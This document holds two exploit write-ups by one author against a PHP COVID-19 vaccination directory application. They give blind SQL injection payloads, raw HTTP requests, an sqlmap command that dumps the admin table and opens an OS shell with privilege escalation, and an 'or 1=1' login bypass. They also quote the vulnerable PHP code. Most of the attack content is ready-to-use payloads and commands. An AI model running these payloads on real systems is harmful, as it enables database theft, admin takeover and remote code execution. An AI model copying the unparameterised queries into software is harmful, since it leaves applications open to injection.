# Title: Covid-19 Directory on Vaccination System 1.0 Blind boolean SQLi To Rce # Author: Hejap Zairy # Date: 28.07.2022 # Vendor: https://www.sourcecodester.com/php/15244/design-and-implementation-covid-19-directory-vacination.html # Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/covid-19-vaccination_0.zip # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache # Steps # 1.- Go to : http://0day.gov//covid-19/hospital.php?cmdcategory=1 # 2 - manual inject Blind SQli https://0day.gov/covid-19/hospital.php?cmdcategory=1%' AND MAKE_SET(1373=1373,8255) AND 'hejap%'='hejap # 3 - SQLi To RCE r00t # 4 - Ubload webshell # 5 - Web Shell to meterpreter full tty shell #vulnerability Code php --- ```php $category = $_GET['cmdcategory']; // $conn = new mysqli ($servername, $username, $password, $dbname) or die("Connection to Database Failed"); $stmt = $conn->stmt_init(); $sql = "SELECT vaccination_center FROM hospital WHERE category_id = (select id_no from category where category like '$category%')"; $stmt->prepare($sql); $stmt->execute(); $result = $stmt->get_result(); while($resultRow = $result->fetch_array(MYSQLI_NUM)) echo ""; $result->close(); $stmt->close(); ``` --- #Status: CRITICAL [+] Payload GET --- GET /covid-19/hospital.php?cmdcategory=1%' AND MAKE_SET(1373=1373,8255) AND 'hejap%'='hejap HTTP/1.1 Host: 0day.gov Cookie: PHPSESSID=av2qn4bthu78hm972lul6vmniv User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Te: trailers Connection: close --- ``` --- Parameter: cmdcategory (GET) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) Payload: cmdcategory=1%' AND MAKE_SET(1373=1373,8255) AND 'hJWj%'='hJWj --- ``` #Blind SQLi Time to Rce #ُExploit sqlmap -u http://0day.gov/covid-19/hospital.php?cmdcategory=1" -p cmdcategory ' --hex --time-sec=10 --dbms=mysql --technique=b --random-agent --eta -D covid19 -T admin --dump --os-shell --priv-esc # Description: The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc # Proof and Exploit: https://i.imgur.com/xeWSc7B.png https://i.imgur.com/XiVBeYa.png ---------------------------------- # Title: Covid-19 Directory on Vaccination System 1.0 - SQLi Authentication Bypass # Author: Hejap Zairy # Date: 28.07.2022 # Vendor: https://www.sourcecodester.com/php/15244/design-and-implementation-covid-19-directory-vacination.html # Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/covid-19-vaccination_0.zip # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache # Steps # 1.- Go to : https://0day.gov/covid-19/admin/login.php # 2 - SQLi Authentication Bypass [admin'or 1=1 or ''='] #vulnerability Code php --- ```php if(isset($_POST['btnlogin'])) { $username = $_POST['txtusername']; $password = $_POST['txtpassword']; $status = 'Active'; $sql = "SELECT * FROM admin WHERE username='" .$username. "' and password = '".$password."' and status = '".$status."' "; ``` --- #Status: CRITICAL [+] Payload POST --- POST /covid-19/admin/login.php HTTP/1.1 Host: 0day.gov User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 72 Origin: http://0day.gov Connection: close Referer: http://0day.gov/covid-19/admin/login.php Cookie: PHPSESSID=c9sbs70le23qois1riekoj8osg Upgrade-Insecure-Requests: 1 txtusername=admin%27or+1%3D1+or+%27%27%3D%27&txtpassword=hejap&btnlogin= --- #Blind SQLi Time to Rce #ُExploit # Description: The SQLi vulnerability We can use this information to construct an injection attack to bypass authentication. # Proof and Exploit: https://i.imgur.com/oDj69Hw.png https://i.imgur.com/JO4SLxa.png https://i.imgur.com/kYgU7xl.png